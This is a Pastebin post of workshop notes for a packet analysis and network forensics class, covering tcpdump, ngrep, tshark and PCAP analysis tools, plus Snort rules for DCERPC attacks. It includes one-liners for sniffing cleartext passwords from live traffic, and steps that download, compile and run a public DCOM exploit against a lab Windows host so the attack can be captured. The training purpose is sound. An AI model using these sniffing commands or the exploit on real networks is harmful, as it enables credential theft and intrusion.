Advertisement
joemccray

Packet Analysis/Network Forensics

Aug 10th, 2016
2,127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.99 KB | None | 0 0
  1. ##########
  2. # VMWare #
  3. ##########
  4. - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
  5.  
  6. - http://www.vmware.com/ap/products/player.html
  7.  
  8.  
  9. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  10.  
  11.  
  12.  
  13. #########################
  14. # Class Virtual Machine #
  15. #########################
  16.  
  17.  
  18. Here is the VMWare virtual machine for the class:
  19.  
  20. https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
  21. user: infosecaddicts
  22. pass: infosecaddicts
  23.  
  24.  
  25. #################
  26. # PCAP Analysis #
  27. #################
  28. ---------------------------Type This-----------------------------------
  29. cd ~/Desktop/
  30.  
  31. mkdir suspiciouspcap/
  32.  
  33. cd suspiciouspcap/
  34.  
  35. wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
  36.  
  37. wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
  38.  
  39.  
  40. perl chaosreader.pl suspicious-time.pcap
  41.  
  42. firefox index.html
  43.  
  44. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  45.  
  46. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  47.  
  48.  
  49. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  50. ------------------------------------------------------------------------
  51.  
  52.  
  53.  
  54. ####################
  55. # Intro to TCPDump #
  56. ####################
  57. ---------------------------Type This-----------------------------------
  58. sudo apt-get install tcpdump
  59.  
  60.  
  61.  
  62. Basic sniffing
  63. --------------
  64. ---------------------------Type This-----------------------------------
  65. sudo tcpdump -n
  66.  
  67.  
  68. Now lets increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy
  69. ---------------------------Type This-----------------------------------
  70. sudo tcpdump -v -n
  71.  
  72.  
  73.  
  74. Getting the ethernet header (link layer headers)
  75. ------------------------------------------------
  76. In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.
  77. ---------------------------Type This-----------------------------------
  78. sudo tcpdump -vv -n -e
  79. ------------------------------------------------------------------------
  80.  
  81. Sniffing a particular interface
  82. -------------------------------
  83. In order to sniff a particular network interface we must specify it with the -i switch. First lets get the list of available interfaces using the -D switch.
  84. ---------------------------Type This-----------------------------------
  85. sudo tcpdump -D
  86. ------------------------------------------------------------------------
  87.  
  88. Filtering packets using expressions - Selecting protocols
  89. ---------------------------------------------------------
  90. ---------------------------Type This-----------------------------------
  91. $ sudo tcpdump -n tcp
  92. ------------------------------------------------------------------------
  93.  
  94. Particular host or port
  95. -----------------------
  96. Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address 192.168.1.101
  97. ---------------------------Type This-----------------------------------
  98. $ sudo tcpdump -n 'src 192.168.1.101'
  99. ------------------------------------------------------------------------
  100.  
  101. Next example picks up dns request packets, either those packets which originate from local machine and go to port 53 of some other machine.
  102. ---------------------------Type This-----------------------------------
  103. $ sudo tcpdump -n 'udp and dst port 53'
  104. ------------------------------------------------------------------------
  105.  
  106. To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
  107. ---------------------------Type This-----------------------------------
  108. $ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
  109. ------------------------------------------------------------------------
  110.  
  111. Search the network traffic using grep
  112.  
  113. Grep can be used along with tcpdump to search the network traffic. Here is a very simple example
  114. ---------------------------Type This-----------------------------------
  115. $ sudo tcpdump -n -A | grep -e 'POST'
  116. ------------------------------------------------------------------------
  117.  
  118. So what is the idea behind searching packets. Well one good thing can be to sniff passwords.
  119. Here is quick example to sniff passwords using egrep
  120.  
  121. ---------------------------Type This-----------------------------------
  122. tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
  123. ------------------------------------------------------------------------
  124.  
  125.  
  126.  
  127. #########
  128. # NGrep #
  129. #########
  130.  
  131. Install ngrep on Ubuntu
  132. ---------------------------Type This-----------------------------------
  133. $ sudo apt-get install ngrep
  134. ------------------------------------------------------------------------
  135.  
  136. Search network traffic for string "User-Agent: "
  137. ---------------------------Type This-----------------------------------
  138. $ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
  139. ------------------------------------------------------------------------
  140. In the above command :
  141. a) tcp and port 80 - is the bpf filter (Berkeley Packet Filter) , that sniffs only TCP packet with port number 80
  142. b) The d option specifies the interface to sniff. eth0 in this case.
  143. c) "User-Agent: " is the string to search for. All packets that have that string are displayed.
  144.  
  145. 2. Search network packets for GET or POST requests :
  146. ---------------------------Type This-----------------------------------
  147. $ sudo ngrep -l -q -d eth0 "^GET |^POST " tcp and port 80
  148. ------------------------------------------------------------------------
  149. The l option makes the output buffered and the q option is for quiet ( Be quiet; don't output any information other than packet headers and their payloads (if relevant) ).
  150.  
  151. 3. ngrep without any options would simply capture all packets.
  152. ---------------------------Type This-----------------------------------
  153. $ sudo ngrep
  154. ------------------------------------------------------------------------
  155.  
  156. Reference:
  157. https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
  158. ---------------------------Type This-----------------------------------
  159. $ sudo ngrep -d eth0 -n 3
  160.  
  161. $ sudo ngrep -d any port 25
  162. ------------------------------------------------------------------------
  163.  
  164. This will let you monitor all activity crossing source or destination port 25
  165. (SMTP).
  166. ---------------------------Type This-----------------------------------
  167. $ sudo ngrep -wi -d wlan0 'user|pass' port 6667
  168.  
  169. $ sudo ngrep -wi -d any 'user|pass' port 21
  170. ------------------------------------------------------------------------
  171.  
  172.  
  173.  
  174.  
  175.  
  176. #############################
  177. # PCAP Analysis with tshark #
  178. #############################
  179. ---------------------------Type This-----------------------------------
  180. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  181.  
  182.  
  183. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  184.  
  185.  
  186. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  187.  
  188.  
  189. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  190.  
  191.  
  192. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
  193.  
  194.  
  195. tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  196.  
  197. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  198.  
  199. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  200.  
  201. tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  202.  
  203. tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  204.  
  205.  
  206. whois rapidshare.com.eyu32.ru
  207.  
  208. whois sploitme.com.cn
  209.  
  210.  
  211. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  212.  
  213. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  214.  
  215. tshark -r suspicious-time.pcap -qz http_req,tree
  216.  
  217. tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  218.  
  219. tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  220.  
  221.  
  222.  
  223. ######################################
  224. # PCAP Analysis with forensicPCAP.py #
  225. ######################################
  226. ---------------------------Type This-----------------------------------
  227. cd ~/Desktop/suspiciouspcap/
  228.  
  229. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  230.  
  231. sudo pip install cmd2==0.7.9
  232.  
  233.  
  234. python forensicPCAP.py suspicious-time.pcap
  235. ------------------------------------------------------------------------
  236.  
  237.  
  238. ---------------------------Type This-----------------------------------
  239. ForPCAP >>> help
  240. ------------------------------------------------------------------------
  241.  
  242. Prints stats about PCAP
  243. ---------------------------Type This-----------------------------------
  244. ForPCAP >>> stat
  245. ------------------------------------------------------------------------
  246.  
  247. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  248. ---------------------------Type This-----------------------------------
  249. ForPCAP >>> dns
  250.  
  251. ForPCAP >>> show
  252. ------------------------------------------------------------------------
  253.  
  254. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  255. ---------------------------Type This-----------------------------------
  256. ForPCAP >>> dstports
  257.  
  258. ForPCAP >>> show
  259. ---------------------------Type This-----------------------------------
  260.  
  261. Prints the number of ip source and store them.
  262. ---------------------------Type This-----------------------------------
  263. ForPCAP >>> ipsrc
  264.  
  265. ForPCAP >>> show
  266. ------------------------------------------------------------------------
  267.  
  268. Prints the number of web's requests and store them
  269. ForPCAP >>> web
  270.  
  271. ForPCAP >>> show
  272. ------------------------------------------------------------------------
  273.  
  274.  
  275. Prints the number of mail's requests and store them
  276. ---------------------------Type This-----------------------------------
  277. ForPCAP >>> mail
  278.  
  279. ForPCAP >>> show
  280. ------------------------------------------------------------------------
  281.  
  282.  
  283.  
  284.  
  285.  
  286. #############################
  287. # Understanding Snort rules #
  288. #############################
  289. Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
  290.  
  291. Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
  292.  
  293. Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
  294.  
  295. Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  296.  
  297. Field 5: Traffic Direction (->)
  298.  
  299. Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
  300.  
  301. Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  302.  
  303. Field 8: MSG - what is actually displayed on the analysts machine
  304.  
  305.  
  306. Let's look at 2 simple rules
  307. ----------------------------------------------------------------------------------
  308. alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
  309. bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
  310. content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
  311. 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
  312. reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
  313.  
  314. alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
  315. attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
  316. depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
  317. 00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
  318. distance:0; within:1; content:”|0b|”; distance:1; within:1; \
  319. byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
  320. 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
  321. sid:2193; rev:1;)
  322. ----------------------------------------------------------------------------------
  323.  
  324.  
  325.  
  326. From your Linux machine ping your Windows machine
  327. ---------------------------Type This-----------------------------------
  328. ping 192.168.150.1
  329. -----------------------------------------------------------------------
  330.  
  331.  
  332. Start wireshark and let's create some simple filters:
  333.  
  334. Filter 1:
  335. ---------------------------Type This-----------------------------------
  336. ip.addr==192.168.150.1
  337. -----------------------------------------------------------------------
  338.  
  339. Filter 2:
  340. ---------------------------Type This-----------------------------------
  341. ip.addr==192.168.150.1 && icmp
  342. -----------------------------------------------------------------------
  343.  
  344.  
  345. Filter 3:
  346. ---------------------------Type This-----------------------------------
  347. ip.addr==192.168.150.1 && !(tcp.port==22)
  348. -----------------------------------------------------------------------
  349. Now stop your capture and restart it (make sure you keep the filter)
  350.  
  351.  
  352.  
  353.  
  354. Back to your Linux machine:
  355. [ CTRL-C ] - to stop your ping
  356. ---------------------------Type This-----------------------------------
  357. wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
  358.  
  359.  
  360. gcc -o exploit oc192-dcom.c
  361.  
  362. ./exploit
  363.  
  364.  
  365. ./exploit -d 192.168.150.1 -t 0
  366. -----------------------------------------------------------------------
  367.  
  368.  
  369.  
  370. Now go back to WireShark and stop the capture.
  371.  
  372.  
  373.  
  374. ###############################################
  375. # Packet Analysis/Network Forensics Challenge #
  376. ###############################################
  377.  
  378. In order to receive your certificate of proficiency you must complete all of the tasks covered in the Packet Analysis/Network Forensics pastebin (http://pastebin.com/SwgnkAhQ).
  379.  
  380. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-PA-NF-Challenge.docx)
  381.  
  382.  
  383.  
  384.  
  385. IMPORTANT NOTE:
  386. Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and kasheia-at-strategicsec-.-com) by Sunday October 23rd at midnight EST.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement